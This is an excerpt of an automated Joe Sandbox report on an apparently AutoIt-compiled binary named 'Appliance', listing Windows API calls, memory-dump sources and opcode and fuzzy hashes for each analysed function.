                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                            • Opcode ID: 636e361be9d18ff9c9b21abbfe377cd286349bee1abebc3025b1d8de56ea0f46
                                                                                                                                            • Instruction ID: 15d96b71e8b632048b18b07dd498c37f4fcbcbf3b376b9bfe085b82572ad5690
                                                                                                                                            • Opcode Fuzzy Hash: 636e361be9d18ff9c9b21abbfe377cd286349bee1abebc3025b1d8de56ea0f46
                                                                                                                                            • Instruction Fuzzy Hash: ED5138B14187499FD320AF51DC86FABB7E8FB84300F81885DF1D9921A1DB308569CB76
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 00E3DB75
                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E3DB7F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                            • String ID: |
                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                            • Opcode ID: 1a9f3f4db33bf8d140d43c090a567fbb0f8f0d9988ae95980a40ca2656f6f42b
                                                                                                                                            • Instruction ID: 4f13c12f3b03c3645e783a6a9814fac6e6241c855e6d5c886b2465594ae91bd6
                                                                                                                                            • Opcode Fuzzy Hash: 1a9f3f4db33bf8d140d43c090a567fbb0f8f0d9988ae95980a40ca2656f6f42b
                                                                                                                                            • Instruction Fuzzy Hash: 7B315C71801119ABCF16EFA1DC95EEEBFB9FF08304F101029F815B6162EB719A16DB60
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00E540BD
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E540F8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                            • String ID: static
                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                            • Opcode ID: 4d506e122fb425251e11b197e235c317b68e36230c5c7cb020b016a47b396950
                                                                                                                                            • Instruction ID: ec5a0b47168cfda3170a2460b09fdb6590a249029b72a02dec72ebaa46ff2305
                                                                                                                                            • Opcode Fuzzy Hash: 4d506e122fb425251e11b197e235c317b68e36230c5c7cb020b016a47b396950
                                                                                                                                            • Instruction Fuzzy Hash: 0A31A1B1100604AEDB24DF64CC40FFB73A8FF48729F109A19FA95A71D0CA70AC85DB61
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E550BD
                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E550D2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID: '
                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                            • Opcode ID: e01f1218de81d0429c3a5d52017f0f8f71b271382d8267aa7ebcb4bfb417534a
                                                                                                                                            • Instruction ID: 5ce4195cf1085f13e27a5477969b2dde60808b83849245c8daf1d070b054ebf6
                                                                                                                                            • Opcode Fuzzy Hash: e01f1218de81d0429c3a5d52017f0f8f71b271382d8267aa7ebcb4bfb417534a
                                                                                                                                            • Instruction Fuzzy Hash: E7315775A0070A9FDB04CFA9C890BEA7BB5FF49304F20146AED04AB381D371A949CF90
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                              • Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242
                                                                                                                                            • GetParent.USER32(?), ref: 00E03440
                                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00E034CA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongWindow$ParentProc
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 2181805148-2063206799
                                                                                                                                            • Opcode ID: fd350299779c09d6e1add79cbc177d0399e7b966f0332b25071cffd964fc8031
                                                                                                                                            • Instruction ID: 27bbc0069664f346f92550bf45cd21cf6b39d401c61a3aa38c5360253001457d
                                                                                                                                            • Opcode Fuzzy Hash: fd350299779c09d6e1add79cbc177d0399e7b966f0332b25071cffd964fc8031
                                                                                                                                            • Instruction Fuzzy Hash: 7F21A830601245AFCF269F78CC49EB93B6AEF45364F180249F6256B2F2C3319E55D720
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DC78B1
                                                                                                                                              • Part of subcall function 00DC7873: GetStockObject.GDI32(00000011), ref: 00DC78C5
                                                                                                                                              • Part of subcall function 00DC7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC78CF
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00E54216
                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00E54230
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                            • String ID: static
                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                            • Opcode ID: d4c91ef109139bf73ab3efbed0bd4ad94d7c42662c5aa9018404e7bac7bd392f
                                                                                                                                            • Instruction ID: 92cde218b163ac36bf952ce93838524b1c068ae82e2f95910dedff9a8493593a
                                                                                                                                            • Opcode Fuzzy Hash: d4c91ef109139bf73ab3efbed0bd4ad94d7c42662c5aa9018404e7bac7bd392f
                                                                                                                                            • Instruction Fuzzy Hash: 861159B6610209AFDB10DFA8CC45AEA7BF8EB08319F005914FD59E3150D634E8559B60
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E3D7C2
                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E3D7EB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                            • String ID: <local>
                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                            • Opcode ID: 87315734c3bf05c4ed4184874fbd6510360193a42b96b16f9be4179da7d3dff8
                                                                                                                                            • Instruction ID: 7565401007e9b9f5bb4639104cdd8e9aaed745cd48831fef625b69117a1f9413
                                                                                                                                            • Opcode Fuzzy Hash: 87315734c3bf05c4ed4184874fbd6510360193a42b96b16f9be4179da7d3dff8
                                                                                                                                            • Instruction Fuzzy Hash: 4511E9715092327DD7384B669C4DEF7BE9DEF127A8F10521BF509A3180D6749844D6F0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00E2761D
                                                                                                                                            • _wcslen.LIBCMT ref: 00E27629
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                            • String ID: STOP
                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                            • Opcode ID: 418f09126d92149d1fb1dfb87ab4c26d8c05c27df3368808a5c0eee4bcf1ff2e
                                                                                                                                            • Instruction ID: bd870a02a97f23084d822e0f16d1783c7b4e6ad9437bedac1f6aa26ac636978f
                                                                                                                                            • Opcode Fuzzy Hash: 418f09126d92149d1fb1dfb87ab4c26d8c05c27df3368808a5c0eee4bcf1ff2e
                                                                                                                                            • Instruction Fuzzy Hash: 2D01D632A189378FCB20AEBDEC419BF73B5FF60754B501528E4A6E7191EB31D940D660
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E22699
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                            • Opcode ID: 3bf9b219af5d755604a927ead3e81aef998591fe3c0e20086a18d80db3f6166f
                                                                                                                                            • Instruction ID: 2febbf801246a8225fb0323075a45d5e8eb50e66c1721a72ff72e71d4e0a8a06
                                                                                                                                            • Opcode Fuzzy Hash: 3bf9b219af5d755604a927ead3e81aef998591fe3c0e20086a18d80db3f6166f
                                                                                                                                            • Instruction Fuzzy Hash: 4D019276A40225ABCB05AB64DC52DFE7764EB46364B00161EF572B72C1DE3198098661
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E22593
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                            • Opcode ID: dd459cdf15ef89ddf952895aa3b29c7332567cb751211fb26c3a16d5061790ee
                                                                                                                                            • Instruction ID: a66c99c410d4ada15e43d2a73b5ef14fe1e250411db00fd64f7793f3aa337c9c
                                                                                                                                            • Opcode Fuzzy Hash: dd459cdf15ef89ddf952895aa3b29c7332567cb751211fb26c3a16d5061790ee
                                                                                                                                            • Instruction Fuzzy Hash: 3A018475A801157BCB15E7A0D962EFE77A8DF45355F50501EB903B7281DB10DA0886B3
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E22615
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                            • Opcode ID: 706e24c3dcbb4efac6f11c5ea376ea14165d1d2c0b09c42470b09f99e71b8681
                                                                                                                                            • Instruction ID: 373cda92db9b046e2dcb8e476183d357e21a518901b36accbd3a0378273c843c
                                                                                                                                            • Opcode Fuzzy Hash: 706e24c3dcbb4efac6f11c5ea376ea14165d1d2c0b09c42470b09f99e71b8681
                                                                                                                                            • Instruction Fuzzy Hash: 6B01F272A401157BCB15E7A0E802FFE33A8DB05344F14212EB903B7282DB61CE0882B2
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E22720
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                            • Opcode ID: 678bf29bf0c1c167486fe06f9f302658a948b2a733eac6b9e637b3e43ed826b7
                                                                                                                                            • Instruction ID: b9a374f4a53798d9a6cea9c23cfb1110e8d1cafe4894e2c4cd31b10a2dc5b1b5
                                                                                                                                            • Opcode Fuzzy Hash: 678bf29bf0c1c167486fe06f9f302658a948b2a733eac6b9e637b3e43ed826b7
                                                                                                                                            • Instruction Fuzzy Hash: C1F0D175A402257BCB15B7A49C42FFE73A8EF05364F402A1EF462B32C2DB6098088271
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00E59B6D
                                                                                                                                              • Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242
                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E59B53
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongWindow$MessageProcSend
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 982171247-2063206799
                                                                                                                                            • Opcode ID: d335e78b524b32d5faad84ecb511067034265ba2e4cf4a043f214e6dd6b5b6e6
                                                                                                                                            • Instruction ID: b30732492f808f5e97bde620a58515a1a195cc2a0ef5720b8b4eab5726754df4
                                                                                                                                            • Opcode Fuzzy Hash: d335e78b524b32d5faad84ecb511067034265ba2e4cf4a043f214e6dd6b5b6e6
                                                                                                                                            • Instruction Fuzzy Hash: 1E01D430105214FFDB25AF15EC44FA67B66FB8536AF100919FE022B1E1C7726819DB65
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E58471
                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00E5847F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongWindow
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 1378638983-2063206799
                                                                                                                                            • Opcode ID: a6cedab54ba94026846e701e9407ec98ca8b23734634e7f6f94c1b963ad4a15c
                                                                                                                                            • Instruction ID: 2534ac793515de73e18e8ac5825951bc8a73af5eb3b9a5a23b76a8cc0d5d649b
                                                                                                                                            • Opcode Fuzzy Hash: a6cedab54ba94026846e701e9407ec98ca8b23734634e7f6f94c1b963ad4a15c
                                                                                                                                            • Instruction Fuzzy Hash: 1DF04F31505255AFCB18EF69DC54D6A77A5EB86325B104A2EFE26E73F0CB309805DB10
                                                                                                                                            APIs
                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E2146F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message
                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                            • Opcode ID: fb5261d7b3a47a594ed610724a6e9d40bf671bb3fbeca73c27512f43a4457195
                                                                                                                                            • Instruction ID: f101711b15aa96766bc41cc28256d8d0f8d5690289ba3b8abb0d6012b5823ffb
                                                                                                                                            • Opcode Fuzzy Hash: fb5261d7b3a47a594ed610724a6e9d40bf671bb3fbeca73c27512f43a4457195
                                                                                                                                            • Instruction Fuzzy Hash: 28E048312487653AD2253795BC07F85BA84CF45B56F11481AFB9CB94C24EE2259092B9
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DDFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DE10E2,?,?,?,00DC100A), ref: 00DDFAD9
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00DC100A), ref: 00DE10E6
                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DC100A), ref: 00DE10F5
                                                                                                                                            Strings
                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DE10F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
